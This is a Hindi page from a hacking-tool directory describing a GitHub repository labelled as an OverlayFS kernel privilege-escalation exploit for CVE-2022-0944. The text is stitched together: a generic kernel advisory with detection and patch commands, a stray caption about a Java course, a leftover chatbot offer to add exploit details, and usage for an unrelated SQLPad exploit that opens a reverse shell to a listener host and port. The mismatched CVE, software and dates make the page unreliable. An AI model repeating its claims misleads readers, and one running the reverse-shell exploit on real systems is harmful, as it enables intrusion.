Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
OverlayFS-PrivEsc-CVE-2022-0944 — शोषण और शमन मार्गदर्शिका CVE-2022-0944 के लिए, OverlayFS में लिनक्स कर्नेल विशेषाधिकार वृद्धि कमजोरी, डिटेक्शन स्क्रिप्ट और पैचिंग निर्देशों के साथ। | Kitploit
उपकरण/GitHubGitHub/artemisxxx37/overlayfs-privesc-cve-2022-0944
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणलर्निंग और शिक्षा
GitHubartemisxxx37/overlayfs-privesc-cve-2022-0944

OverlayFS-PrivEsc-CVE-2022-0944

शोषण और शमन मार्गदर्शिका CVE-2022-0944 के लिए, OverlayFS में लिनक्स कर्नेल विशेषाधिकार वृद्धि कमजोरी, डिटेक्शन स्क्रिप्ट और पैचिंग निर्देशों के साथ।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
11 साल पहलेअभी तक समीक्षित नहीं

CVE-2022-0944: OverlayFS में विशेषाधिकार वृद्धि भेद्यता 🛡️

CVE Severity

लिनक्स कर्नेल के OverlayFS में विशेषाधिकार वृद्धि भेद्यता के लिए सुरक्षा सलाह और शमन मार्गदर्शिका।

📜 अवलोकन

CVE-2022-0944 लिनक्स कर्नेल के OverlayFS उपतंत्र में एक सुरक्षा भेद्यता है, जो स्थानीय हमलावरों को विशिष्ट कॉन्फ़िगरेशन में फ़ाइल निर्माण के अनुचित प्रबंधन के माध्यम से विशेषाधिकार बढ़ाने की अनुमति देती है।

📌 तकनीकी विवरण

स्क्रीनशॉट 2025-03-26 17-15-46 पर: मैंने जावा शुरुआती के लिए एक कोर्स प्रकाशित किया, दुर्भाग्य से मार्गदर्शन के लिए मेरे पास कोई README फ़ाइल नहीं है

🚨 प्रभाव

एक स्थानीय हमलावर निम्न कार्य कर सकता है:

root@kitploit:~
क्राफ्टेड फ़ाइल संचालनों के माध्यम से रूट विशेषाधिकार प्राप्त करना
सुरक्षा प्रतिबंधों को दरकिनार करना
संवेदनशील सिस्टम फ़ाइलों को संशोधित करना
पूरे सिस्टम की अखंडता से समझौता करना

🔍 पहचान

  1. कर्नेल संस्करण जांचें uname -r

Affected versions: 5.8 <= kernel < 5.16.12

  1. OverlayFS उपयोग सत्यापित करें mount | grep overlay

Systems using OverlayFS mounts are at risk

  1. सुरक्षा सलाहकार जांचें

For Debian/Ubuntu:

root@kitploit:~
grep CVE-2022-0944 /var/log/apt/history.log

# For RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944

4.🛡️ शमन

आधिकारिक पैच

निम्नलिखित पैच किए गए संस्करणों में से किसी एक पर अपडेट करें:

root@kitploit:~
लिनक्स कर्नेल 5.16.12 या बाद का
विक्रेता-विशिष्ट बैकपोर्टेड पैच

अपडेट कमांड:

Ubuntu/Debian

sudo apt update && sudo apt upgrade linux-image-$(uname -r)

RHEL/CentOS

sudo yum update kernel

कार्य-विकल्प (यदि तुरंत पैचिंग संभव न हो)

root@kitploit:~
OverlayFS उपयोग प्रतिबंधित करें:
  sudo modprobe -r overlay

नेमस्पेस प्रतिबंध लागू करें:
# Create unprivileged user namespace unshare -Ur

root@kitploit:~
    # Mount with user restrictions
    mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt

SELinux/AppArmor नीतियां लागू करें: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }

⚠️ अस्वीकरण यह दस्तावेज़ केवल सूचनात्मक उद्देश्यों के लिए प्रदान किया गया है। सटीकता सुनिश्चित करने के प्रयास किए गए हैं, फिर भी कोई गारंटी प्रदान नहीं की जाती है। उत्पादन परिनियोजन से पहले हमेशा विकास वातावरण में पैच का परीक्षण करें।

अंतिम अद्यतन: 2023-10-01 | परिवर्तन लॉग देखें

मुख्य विशेषताएं:

  1. सुरक्षा बैज के साथ स्पष्ट भेद्यता वर्गीकरण
  2. त्वरित-संदर्भ तकनीकी विवरण तालिका
  3. कार्रवाई योग्य पहचान और शमन चरण
  4. विक्रेता-विशिष्ट अद्यतन कमांड
  5. सुरक्षा नीति उदाहरण (SELinux/AppArmor)
  6. आधिकारिक संदर्भ लिंक
  7. भेद्यता प्रकटीकरण मानकों का अनुपालन

यह README प्रारूप इसके लिए उपयुक्त है:

  • सुरक्षा टीमें
  • सिस्टम प्रशासक
  • DevOps इंजीनियर
  • ओपन-सोर्स अनुरक्षक
  • भेद्यता डेटाबेस

क्या आप चाहेंगे कि मैं:

  1. विशिष्ट विक्रेता पैच जानकारी जोड़ूं?
  2. शोषण प्रूफ-ऑफ-कॉन्सेप्ट विवरण शामिल करूं (सावधानी के साथ)?
  3. और अधिक पहचान स्क्रिप्ट जोड़ूं?
  4. किसी विशिष्ट लिनक्स वितरण के लिए अनुकूलित करूं?

उपयोग

root@kitploit:~
usage: main.py [-h] url lhost lport [username] [password]

positional arguments:
  url         URL to SQLPad
  lhost       Listener host address for reverse shell
  lport       Listener port for reverse shell
  username    login username (optional)
  password    login password (optional)

options:
  -h, --help  show this help message and exit

उदाहरण:

root@kitploit:~
# install requirements
pip install -r requirements.txt

# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0

# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin

अस्वीकरण

इस रिपॉजिटरी में कोड और उपकरण केवल शैक्षिक उद्देश्यों के लिए हैं, विशेष रूप से साइबर सुरक्षा पाठ्यक्रमों और शिक्षण वातावरण में उपयोग के लिए। इस कोड के लेखक इस कोड के उपयोग, दुरुपयोग या संशोधन से उत्पन्न किसी भी परिणाम के लिए कोई जिम्मेदारी नहीं लेते हैं। कोड "जैसा है" बिना किसी वारंटी के प्रदान किया गया है, चाहे वह स्पष्ट हो या निहित, जिसमें व्यापारिकता या किसी विशेष उद्देश्य के लिए उपयुक्तता की निहित वारंटियां शामिल हैं, लेकिन इन्हीं तक सीमित नहीं है।

टूल डाउनलोड करें